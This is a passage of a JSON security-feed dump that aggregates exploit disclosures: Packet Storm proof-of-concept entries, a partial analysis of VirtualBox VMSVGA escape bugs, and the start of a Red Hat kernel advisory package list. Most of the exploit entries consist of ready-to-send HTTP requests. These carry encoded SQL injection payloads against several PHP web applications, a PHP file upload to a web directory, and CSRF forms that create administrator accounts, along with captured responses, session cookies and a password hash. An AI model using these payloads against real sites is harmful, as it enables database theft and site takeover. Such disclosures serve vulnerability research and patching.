ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221537f5ec92a5c39fef327d355b49a9d4%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541933047%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D4dc0c3b97103da70527fd4cb032a2a78165b670b \nConnection: keep-alive \nHTTP/1.1 200 OK \nX-Powered-By: PHP/5.5.10 \nSet-Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221537f5ec92a5c39fef327d355b49a9d4%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541933047%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D4dc0c3b97103da70527fd4cb032a2a78165b670b; expires=Sun, 11-Nov-2018 12:48:15 GMT; Max-Age=7200; path=/ \nContent-Type: text/html \nTransfer-Encoding: chunked \n \n# POC: \n# 3) \n# http://localhost/[PATH]/?c=inmail&m=inmailentry&mailid=[SQL] \n# \nGET /[PATH]/?c=inmail&m=inmailentry&mailid=%2d%31%29%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%73%71%6c%69%74%65%5f%76%65%72%73%69%6f%6e%28%29%2c%34%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2c%31%34%2c%31%35%2c%31%36%2c%31%37%2c%31%38%2c%31%39%2c%32%30%2c%32%31%2d%2d HTTP/1.1 \nHost: TARGET:8080 \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%229bc792cd7f3df106dfaa30c4f9838dfb%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541931921%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D23567922d51348e5db91632764ff616f7d5670ad \nConnection: keep-alive \nHTTP/1.1 200 OK \nX-Powered-By: PHP/5.5.10 \nSet-Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221537f5ec92a5c39fef327d355b49a9d4%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541933047%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D4dc0c3b97103da70527fd4cb032a2a78165b670b; expires=Sun, 11-Nov-2018 12:44:07 GMT; Max-Age=7200; path=/ \nSet-Cookie: ci_session=a%3A6%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%221537f5ec92a5c39fef327d355b49a9d4%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A12%3A%22192.168.1.27%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A68%3A%22Mozilla%2F5.0+%28X11%3B+Linux+x86_64%3B+rv%3A45.0%29+Gecko%2F20100101+Firefox%2F45.0%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1541933047%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A11%3A%22check_login%22%3Ba%3A5%3A%7Bs%3A10%3A%22login_name%22%3Bs%3A4%3A%22mail%22%3Bs%3A8%3A%22login_id%22%3Bs%3A2%3A%2224%22%3Bs%3A8%3A%22login_ad%22%3Bb%3A0%3Bs%3A10%3A%22login_type%22%3Bs%3A1%3A%222%22%3Bs%3A9%3A%22logged_in%22%3Bb%3A1%3B%7D%7D4dc0c3b97103da70527fd4cb032a2a78165b670b; expires=Sun, 11-Nov-2018 12:44:07 GMT; Max-Age=7200; path=/ \nContent-Type: text/html \nTransfer-Encoding: chunked \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150327/maitramts172-sql.txt"}, {"lastseen": "2018-11-14T10:23:07", "references": [], "description": "", "edition": 1, "reporter": "Ihsan Sencan", "published": "2018-11-14T00:00:00", "title": "Webiness Inventory 2.3 SQL Injection", "type": "packetstorm", "enchantments": {"score": {"modified": "2018-11-14T10:23:07", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-11-14T00:00:00", "id": "PACKETSTORM:150320", "href": "https://packetstormsecurity.com/files/150320/Webiness-Inventory-2.3-SQL-Injection.html", "sourceData": "`# Exploit Title: Webiness Inventory 2.3 - SQL Injection \n# Dork: N/A \n# Date: 2018-11-11 \n# Exploit Author: Ihsan Sencan \n# Vendor Homepage: https://github.com/webiness/webiness_inventory \n# Software Link: https://kent.dl.sourceforge.net/project/webinessinventory/2.3/webiness_inventory-2.3.zip \n# Version: 2.3 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: N/A \n \n# POC: \n# 1) \n# http://localhost/[PATH]/protected/library/ajax/WsModelGrid.php \n# \nPOST /[PATH]/protected/library/ajax/WsModelGrid.php HTTP/1.1 \nHost: TARGET \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nConnection: keep-alive \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 541 \nmodel=PartnerModel&order=%28%53%45%4c%45%43%54%20%31%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%32%3d%32%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29 \nHTTP/1.1 500 Internal Server Error \nDate: Sun, 11 Nov 2018 16:16:54 GMT \nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 \nX-Powered-By: PHP/5.6.30 \nContent-Length: 315 \nConnection: close \nContent-Type: text/html; charset=UTF-8 \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150320/webinessinventory23-sql.txt"}, {"lastseen": "2018-11-14T10:23:07", "references": [], "description": "", "edition": 1, "reporter": "Ihsan Sencan", "published": "2018-11-14T00:00:00", "title": "Alive Parish 2.0.4 File Upload / SQL Injection", "type": "packetstorm", "enchantments": {"score": {"modified": "2018-11-14T10:23:07", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-11-14T00:00:00", "id": "PACKETSTORM:150328", "href": "https://packetstormsecurity.com/files/150328/Alive-Parish-2.0.4-File-Upload-SQL-Injection.html", "sourceData": "`# Exploit Title: Alive Parish 2.0.4 - SQL Injection / Arbitrary File Upload \n# Dork: N/A \n# Date: 2018-11-11 \n# Exploit Author: Ihsan Sencan \n# Vendor Homepage: https://demo.aliveparish.com \n# Software Link: https://netcologne.dl.sourceforge.net/project/aliveparish/aliveparish-v2.0.zip \n# Version: 2.0.4 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: N/A \n \n# POC: \n# 1) \n# http://localhost/[PATH]/parish/search?key=[SQL] \n# \nGET /[PATH]/parish/search?key=%27||(SeleCT%20%27Efe%27%20FroM%20duAL%20WheRE%20110=110%20AnD%20(seLEcT%20112%20frOM(SElecT%20CouNT(*),ConCAT(CONcat(0x203a20,UseR(),DAtaBASe(),VErsION()),(SeLEct%20(ELT(112=112,1))),FLooR(RAnd(0)*2))x%20FROM%20INFOrmatION_SchEMA.PluGINS%20grOUp%20BY%20x)a))||%27 HTTP/1.1 \nHost: TARGET \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: PHPSESSID=d98c14a2b1f274925e7993331153a20d \nConnection: keep-alive \nHTTP/2.0 500 Internal Server Error \nServer: nginx \nDate: Sun, 11 Nov 2018 09:18:22 GMT \nContent-Type: text/html; charset=UTF-8 \nx-powered-by: PHP/7.1.16 \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control: no-store, no-cache, must-revalidate \nPragma: no-cache \nX-Firefox-Spdy: h2 \n \n# POC: \n# 2) \n# http://localhost/[PATH]/person/photo/1 \n# \n# http://localhost/[PATH]/images/uploaded/[FILE] \n# \n<html> \n<body> \n<form enctype=\"multipart/form-data\" id=\"families-form\" action=\"http://localhost/[PATH]/person/photo/1\" method=\"post\"> \n<input id=\"ytPeople_raw_photo\" value=\"\" name=\"People[raw_photo]\" type=\"hidden\"> \n<input name=\"People[raw_photo]\" id=\"People_raw_photo\" type=\"file\"> \n<input name=\"yt0\" value=\"Save\" type=\"submit\"> \n</form> \n</body> \n</html> \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150328/aliveparish204-sql.txt"}, {"lastseen": "2018-11-14T10:23:07", "references": [], "description": "", "edition": 1, "reporter": "Ihsan Sencan", "published": "2018-11-14T00:00:00", "title": "Webiness Inventory 2.3 Cross Site Request Forgery / Shell Upload", "type": "packetstorm", "enchantments": {"score": {"modified": "2018-11-14T10:23:07", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-11-14T00:00:00", "id": "PACKETSTORM:150319", "href": "https://packetstormsecurity.com/files/150319/Webiness-Inventory-2.3-Cross-Site-Request-Forgery-Shell-Upload.html", "sourceData": "`# Exploit Title: Webiness Inventory 2.3 - Arbitrary File Upload / Cross-Site Request Forgery Add Admin) \n# Dork: N/A \n# Date: 2018-11-11 \n# Exploit Author: Ihsan Sencan \n# Vendor Homepage: https://github.com/webiness/webiness_inventory \n# Software Link: https://kent.dl.sourceforge.net/project/webinessinventory/2.3/webiness_inventory-2.3.zip \n# Version: 2.3 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: N/A \n \n# POC: \n# 1) \n# http://localhost/[PATH]/protected/library/ajax/WsSaveToModel.php \n# \n# http://localhost/[PATH]/runtime/PartnerModel/[FILE] \n# \nPOST /[PATH]/protected/library/ajax/WsSaveToModel.php HTTP/1.1 \nHost: TARGET \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nConnection: keep-alive \nContent-Type: multipart/form-data; boundary= \n---------------------------19855571512095910543502690828 \nContent-Length: 384 \n-----------------------------19855571512095910543502690828 \nContent-Disposition: form-data; name=\"model_name\" \nPartnerModel \n-----------------------------19855571512095910543502690828 \nContent-Disposition: form-data; name=\"logo\"; filename=\"phpinfo.php\" \nContent-Type: application/force-download \n<?php \nphpinfo(); \n?> \n-----------------------------19855571512095910543502690828-- \nHTTP/1.1 200 OK \nDate: Sun, 11 Nov 2018 16:57:15 GMT \nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 \nX-Powered-By: PHP/5.6.30 \nContent-Length: 0 \nKeep-Alive: timeout=5, max=100 \nConnection: Keep-Alive \nContent-Type: text/html; charset=UTF-8 \n \n# \nGET /[PATH]/runtime/PartnerModel/phpinfo.php HTTP/1.1 \nHost: 192.168.1.27 \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nConnection: keep-alive \nHTTP/1.1 200 OK \nDate: Sun, 11 Nov 2018 16:58:27 GMT \nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 \nX-Powered-By: PHP/5.6.30 \nKeep-Alive: timeout=5, max=100 \nConnection: Keep-Alive \nTransfer-Encoding: chunked \nContent-Type: text/html; charset=UTF-8 \n \n# POC: \n# 2) \n# http://localhost/[PATH]/protected/library/ajax/WsSaveToModel.php \n# \n# http://localhost/[PATH]/runtime/PartnerModel/[FILE] \n# \n<html> \n<body> \n<form action=\"http://localhost/[PATH]/protected/library/ajax/WsSaveToModel.php\" method=\"POST\" enctype=\"multipart/form-data\"> \n<input name=\"model_name\" value=\"PartnerModel\" type=\"hidden\"> \n<input name=\"logo\" type=\"file\"> \n<button type=\"submit\">Ver Ayari</button> \n</form> \n</body> \n</html> \n \n# POC: \n# 3) \n# http://localhost/[PATH]/protected/library/ajax/WsSaveToModel.php \n# \n<html> \n<body> \n<form action=\"http://localhost/[PATH]/protected/library/ajax/WsSaveToModel.php\" method=\"POST\" enctype=\"multipart/form-data\"> \n<input name=\"model_name\" value=\"Ws_userModel\" type=\"hidden\"> \n<input name=\"id\" value=\"3\" placeholder=\"user_id\" type=\"number\"> \n<input name=\"email\" value=\"\" placeholder=\"mail_address\" type=\"text\"> \n<input name=\"password\" value=\"\" placeholder=\"password\" type=\"password\"> \n<input name=\"user_salt\" value=\"\" type=\"hidden\"> \n<input name=\"verification_code\" value=\"\" type=\"hidden\"> \n<input value=\"false\" name=\"is_verified\" type=\"hidden\"><input name=\"is_verified\" value=\"true\" data-val=\"true\" class=\"\" type=\"checkbox\"> verified account?</label></div></div> \n<input value=\"false\" name=\"is_active\" type=\"hidden\"><input name=\"is_active\" value=\"true\" data-val=\"true\" class=\"\" type=\"checkbox\"> active account?</label> \n<button type=\"submit\">Ver Ayari</button> \n</form> \n</body> \n</html> \n \n# \nPOST /[PATH]/protected/library/ajax/WsSaveToModel.php HTTP/1.1 \nHost: 192.168.1.27 \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nConnection: keep-alive \nContent-Type: multipart/form-data; boundary= \n---------------------------712753139516771986337452300 \nContent-Length: 989 \n-----------------------------712753139516771986337452300 \nContent-Disposition: form-data; name=\"model_name\" \nWs_userModel \n-----------------------------712753139516771986337452300 \nContent-Disposition: form-data; name=\"id\" \n66 \n-----------------------------712753139516771986337452300 \nContent-Disposition: form-data; name=\"email\" \nefe@omerefe.com \n-----------------------------712753139516771986337452300 \nContent-Disposition: form-data; name=\"password\" \nefe \n-----------------------------712753139516771986337452300 \nContent-Disposition: form-data; name=\"user_salt\" \n-----------------------------712753139516771986337452300 \nContent-Disposition: form-data; name=\"is_verified\" \n1 \n-----------------------------712753139516771986337452300 \nContent-Disposition: form-data; name=\"is_active\" \n1 \n-----------------------------712753139516771986337452300 \nContent-Disposition: form-data; name=\"verification_code\" \n-----------------------------712753139516771986337452300-- \nHTTP/1.1 200 OK \nDate: Sun, 11 Nov 2018 17:19:11 GMT \nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 \nX-Powered-By: PHP/5.6.30 \nContent-Length: 0 \nKeep-Alive: timeout=5, max=100 \nConnection: Keep-Alive \nContent-Type: text/html; charset=UTF-8 \n \n/* `exploitdb`.`ws_user` */ \n$ws_user = array( \narray('id' => '66','email' => 'efe@omerefe.com','password' => 'f91f01637f051f2d44d6ee847e4bd339e7f89aab11ace6ab30c6c0af9d0f91fdcf90deb1e01a26320fe551c778c26ed57501f8cab4a026d3eaffbacdd3838794','user_salt' => '29tevoxs9n8lygh1w4xagv4j0w5w4q4ti3nokzsm0655zjl2ci','is_verified' => '1','is_active' => '1','verification_code' => '') \n); \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150319/webinessinventory23-shellxsrf.txt"}, {"lastseen": "2018-11-14T10:23:07", "references": [], "description": "", "edition": 1, "reporter": "Ihsan Sencan", "published": "2018-11-14T00:00:00", "title": "Silurus Classifieds Script 2.0 SQL Injection", "type": "packetstorm", "enchantments": {"score": {"modified": "2018-11-14T10:23:07", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": [], "modified": "2018-11-14T00:00:00", "id": "PACKETSTORM:150313", "href": "https://packetstormsecurity.com/files/150313/Silurus-Classifieds-Script-2.0-SQL-Injection.html", "sourceData": "`# Exploit Title: Silurus Classifieds Script 2.0 - SQL Injection \n# Dork: N/A \n# Date: 2018-11-11 \n# Exploit Author: Ihsan Sencan \n# Vendor Homepage: http://snowhall.com/store/silurus/ \n# Software Link: https://netcologne.dl.sourceforge.net/project/silurus/silurus_2.0.zip \n# Version: 2.0 \n# Category: Webapps \n# Tested on: WiN7_x64/KaLiLinuX_x64 \n# CVE: N/A \n \n# POC: \n# 1) \n# http://localhost/[PATH]/wcategory.php?ID=[SQL] \n# \nGET /[PATH]/wcategory.php?ID=%36%20%55%4e%49%4f%4e%20%53%45%4c%45%43%54%20%31%2c%32%2c%33%2c%28%53%45%4c%45%43%54%20%47%52%4f%55%50%5f%43%4f%4e%43%41%54%28%74%61%62%6c%65%5f%6e%61%6d%65%20%53%45%50%41%52%41%54%4f%52%20%30%78%33%63%36%32%37%32%33%65%29%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%54%41%42%4c%45%53%20%57%48%45%52%45%20%54%41%42%4c%45%5f%53%43%48%45%4d%41%3d%44%41%54%41%42%41%53%45%28%29%29%2c%35%2c%36%2c%37%2c%38%2c%39%2c%31%30%2c%31%31%2c%31%32%2c%31%33%2d%2d%20%2d HTTP/1.1 \nHost: TARGET \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nCookie: PHPSESSID=9ujoo8291nqkbribmilpl0sdo3; __utma=112705988.1527518065.1541929662.1541929662.1541929662.1; __utmb=112705988.1.10.1541929662; __utmc=112705988; __utmz=112705988.1541929662.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utmt=1 \nConnection: keep-alive \nHTTP/1.1 200 OK \nDate: Sun, 11 Nov 2018 08:48:25 GMT \nServer: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30 \nX-Powered-By: PHP/5.6.30 \nExpires: Thu, 19 Nov 1981 08:52:00 GMT \nCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 \nPragma: no-cache \nKeep-Alive: timeout=5, max=100 \nConnection: Keep-Alive \nTransfer-Encoding: chunked \nContent-Type: text/html; charset=UTF-8 \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/150313/silurusclassifieds20-sql.txt"}], "myhack58": [{"lastseen": "2018-11-14T16:17:34", "references": [], "description": "VirtualBox simulates a VMware virtual SVGA devices, which interface the detailed information and programming model can be on the network from public access. In addition, in the VMware hosted I/O architecture of GPU virtualization on paper, for the VMware SVGA device architecture had a very good description. In addition, Kostya Kortchinsky's CLOUDBURST \u2013 Vmware Guest to Host escape story of a text, describes in detail how to use the VMware SVGA device of the vulnerabilities VM-escape. \nOracle January 2015 critical patch update, fixing a VMSVGA device the presence of a range of issues, CVE-2014-6595, CVE-2014-6588, CVE-2014-6589, CVE-2014-6590, CVE-2015-0427-in. In the article by the hardware simulation to attack a virtual machine management program, provides information about VirtualBox in VMSVGA vulnerability of some of the details. \nIt is worth noting that, due to the VMSVGA device is not enabled by default, so affected users may be very limited. However, the user can according to the VBoxManage documentation for instructions to enable this feature. \nVBoxManage modifyvm VMNAME --graphicscontroller vmsvga \nOracle in 2017, 7 months, and 2017 10 month's critical patch update, fixes VMSVGA vulnerability CVE-2017-10210, CVE-2017-10236, CVE-2017-10239, CVE-2017-10240, CVE-2017-10392, CVE-2017-10407 and CVE-2017-10408 these vulnerabilities is by I find and report. In addition, from 360 Gear team of Li Qiang, also simultaneously and independently discovered the CVE-2017-10210, CVE-2017-10236, CVE-2017-10239 and CVE-2017-10240 the four holes. In this blog post, detailing some of the issues and demonstrates how to use these vulnerabilities are virtual machine escape. \nWe are in the macOS environment VirtualBox 5.1.22 version. The Linux version of VirtualBox does not support VMSVGA 3D function, this function only on Windows and macOS. \nvmsvga3dSurfaceDefine\uff08DevVGA-SVGA3d.cpp in validation validating face[0]. numMipLevel process there is an integer overflow vulnerability, CVE-2017-10210\uff09 \nint vmsvga3dSurfaceDefine(PVGASTATE pThis, a uint32_t that sid, a uint32_t that surfaceFlags, SVGA3dSurfaceFormat format, \nSVGA3dSurfaceFace face[SVGA3D_MAX_SURFACE_FACES], a uint32_t that multisampleCount, \nSVGA3dTextureFilter autogenFilter, a uint32_t that cMipLevels, SVGA3dSize *paMipLevelSizes) \n{ \n. . . \n/* cFaces must be 6 for a cubemap, and 1 otherwise. */ \nAssertReturn(cFaces == (a uint32_t that)((surfaceFlags & SVGA3D_SURFACE_CUBEMAP) ? 6 : 1), VERR_INVALID_PARAMETER); \nAssertReturn(cMipLevels == cFaces * face[0]. numMipLevels, VERR_INVALID_PARAMETER); \n. . . \n} \nIn the use of\u201csurfaceflag\u201d SVGA3D_SURFACE_CUBEMAP,\u201ccFaces\u201dvalue can be set to 6. Then, you can\u201cface[0]. numMipLevels\u201dset as cFaces * face[0]. numMipLevels wraps of the calculation results.\u201ccMipLevels\u201ddepends on SVGA_3D_CMD_SURFACE_DEFINE command passed SVGA3dSize structure number, e.g. 2 == 6 * 0x2aaaaaab it. \nFor a plurality of other commands in the face[0]. numMipLevels value is that results in memory corruption culprit. In CVE-2017-10210 PoC, the use of the SVGA_3D_CMD_SURFACE_DESTROY command to show memory corruption, ultimately leading to free()is invalid. \nint vmsvga3dSurfaceDestroy(PVGASTATE pThis, a uint32_t that sid) \n{ \n. . . \nif (pSurface->pMipmapLevels) \n{ \nfor (uint32_t face=0; face cFaces; face++) \n{ \nfor (uint32_t i=0; i faces[face]. numMipLevels; i++) \n{ \na uint32_t that idx = i + face * pSurface->faces[0]. numMipLevels; \nif (pSurface->pMipmapLevels[idx]. pSurfaceData) \nRTMemFree(pSurface->pMipmapLevels[idx]. pSurfaceData); \n} \n} \nRTMemFree(pSurface->pMipmapLevels); \n} \n. . . \n} \nrenorobert@ubuntu:~/virtualbox-vmsvga-bugs/CVE-2017-10210$ sudo ./ poc \n[sudo] password for renorobert: \npoc: [+] Triggering the integer overflow using SVGA_3D_CMD_SURFACE_DEFINE... \npoc: [+] Triggering the crash using SVGA_3D_CMD_SURFACE_DESTROY... \n[lldbinit] process attach --pid 57984 \n[-] warning: get_frame() failed. Is the target binary started? \nProcess 57984 stopped \n* thread #1, queue = 'com. apple. main-thread', stop reason = signal SIGSTOP \nframe #0: 0x00007fff5f9ae20a libsystem_kernel. dylib`mach_msg_trap + 10 \nTarget 0: (VirtualBoxVM) stopped. \n\n\n**[1] [[2]](<92036_2.htm>) [[3]](<92036_3.htm>) [[4]](<92036_4.htm>) [[5]](<92036_5.htm>) [[6]](<92036_6.htm>) [[7]](<92036_7.htm>) [[8]](<92036_8.htm>) [[9]](<92036_9.htm>) [[10]](<92036_10.htm>) [[11]](<92036_11.htm>) [next](<92036_2.htm>)**\n", "edition": 1, "reporter": "\u4f5a\u540d", "published": "2018-11-14T00:00:00", "title": "VirtualBox VMSVGA a plurality of virtual machine escape vulnerability analysis-vulnerability warning-the black bar safety net", "type": "myhack58", "enchantments": {"score": {"modified": "2018-11-14T16:17:34", "vector": "NONE", "value": 7.5}}, "bulletinFamily": "info", "cvelist": ["CVE-2017-10239", "CVE-2015-0427", "CVE-2014-6595", "CVE-2017-10236", "CVE-2017-10407", "CVE-2017-10408", "CVE-2017-10210", "CVE-2017-10240", "CVE-2017-10392", "CVE-2014-6590", "CVE-2014-6589", "CVE-2014-6588"], "modified": "2018-11-14T00:00:00", "id": "MYHACK58:62201892036", "href": "http://www.myhack58.com/Article/html/3/62/2018/92036.htm", "cvss": {"score": 4.6, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "redhat": [{"lastseen": "2018-11-13T18:41:47", "_object_types": ["robots.models.base.Bulletin", "robots.models.redhat.RedHatBulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64", "packageName": "kernel", "packageFilename": "kernel-3.10.0-514.61.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64le", "packageName": "kernel", "packageFilename": "kernel-3.10.0-514.61.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "s390x", "packageName": "kernel", "packageFilename": "kernel-3.10.0-514.61.1.el7.s390x.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "src", "packageName": "kernel", "packageFilename": "kernel-3.10.0-514.61.1.el7.src.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "x86_64", "packageName": "kernel", "packageFilename": "kernel-3.10.0-514.61.1.el7.x86_64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "noarch", "packageName": "kernel-abi-whitelists", "packageFilename": "kernel-abi-whitelists-3.10.0-514.61.1.el7.noarch.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64", "packageName": "kernel-bootwrapper", "packageFilename": "kernel-bootwrapper-3.10.0-514.61.1.el7.ppc64.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64le", "packageName": "kernel-bootwrapper", "packageFilename": "kernel-bootwrapper-3.10.0-514.61.1.el7.ppc64le.rpm", "operator": "lt"}, {"OS": "RedHat", "OSVersion": "7", "packageVersion": "3.10.0-514.61.1.el7", "arch": "ppc64", 